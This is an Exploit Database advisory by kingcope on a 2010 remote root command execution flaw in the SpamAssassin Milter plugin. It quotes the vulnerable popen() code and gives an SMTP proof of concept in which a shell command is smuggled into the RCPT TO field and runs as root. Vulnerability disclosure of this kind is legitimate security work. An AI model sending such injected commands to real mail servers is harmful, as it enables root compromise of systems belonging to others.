Apache SpamAssassin Milter Plugin 0.3.1 – Remote Command Execution

• Exploit Database
• 12 阅读

• 作者： kingcope
  日期： 2010-03-09
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/11662/

• Description: The Spamassassin Milter plugin suffers from a remote root command execution vulnerability. Full exploit details provided.
  Author:	Kingcope
  
  Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the
  shadows not HERE)
  aka the postfix_joker advisory
  
  Logic fuckup?
  
  March 07 2010 // if you read this 10 years later you are definetly
  seeking the nice 0days!
  
  Greetz fly out to alex,andi,adize :D
  +++ KEEP IT ULTRA PRIV8 +++
  
  Software
  +-+-+-+-+
  Apache Spamassassin
  SpamAssassin is a mail filter which attempts to identify spam using
  a variety of mechanisms including text analysis, Bayesian filtering,
  DNS blocklists, and collaborative filtering databases.
  
  SpamAssassin is a project of the Apache Software Foundation (ASF).
  
  Postfix
  What is Postfix? It is Wietse Venema's mailer that started life at IBM
  research as an alternative to the widely-used Sendmail program.
  Postfix attempts to be fast, easy to administer, and secure.
  The outside has a definite Sendmail-ish flavor, but the inside is
  completely different.
  
  Spamassassin Milter
  A little plugin for the Sendmail Milter (Mail Filter) library
  that pipes all incoming mail (including things received by rmail/UUCP)
  through the SpamAssassin, a highly customizable SpamFilter.
  
  Remote Code Execution Vulnerability
  +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  
  The Spamassassin Milter Plugin can be tricked into executing any command
  as the root user remotely.
  If spamass-milter is run with the expand flag (-x option) it runs a
  popen() including the attacker supplied 
  recipient (RCPT TO).
  
  >From spamass-milter-0.3.1 (-latest) Line 820:
  
  //
  // Gets called once for each recipient
  //
  // stores the first recipient in the spamassassin object and
  // stores all addresses and the number thereof (some redundancy)
  //
  
  sfsistat
  mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
  {
  struct context *sctx = (struct context*)smfi_getpriv(ctx);
  SpamAssassin* assassin = sctx->assassin;
  FILE *p;
  #if defined(__FreeBSD__)
  int rv;
  #endif
  
  debug(D_FUNC, "mlfi_envrcpt: enter");
  
  if (flag_expand)
  {
  /* open a pipe to sendmail so we can do address
  expansion */
  
  char buf[1024];
  char *fmt="%s -bv \"%s\" 2>&1";
  
  #if defined(HAVE_SNPRINTF)
  snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
  #else
  /* XXX possible buffer overflow here // is this a
  joke ?! */
  sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
  #endif
  
  debug(D_RCPT, "calling %s", buf);
  
  #if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
  rv = pthread_mutex_lock(&popen_mutex);
  if (rv)
  {
  debug(D_ALWAYS, "Could not lock popen mutex: %
  s", strerror(rv));
  abort();
  }
  #endif
  
  p = popen(buf, "r");				[1]
  if (!p)
  {
  debug(D_RCPT, "popen failed(%s).Will not
  expand aliases", strerror(errno));
  assassin->expandedrcpt.push_back(envrcpt[0]);
  
  
  [1] the vulnerable popen() call.
  
  Remote Root Exploit PoC through postfix
  +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  
  $ nc localhost 25
  220 ownthabox ESMTP Postfix (Ubuntu)
  mail from: me@me.com
  250 2.1.0 Ok
  rcpt to: root+:"|touch /tmp/foo"
  250 2.1.5 Ok
  
  $ ls -la /tmp/foo
  -rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
  
  Signed,
  
  Kingcope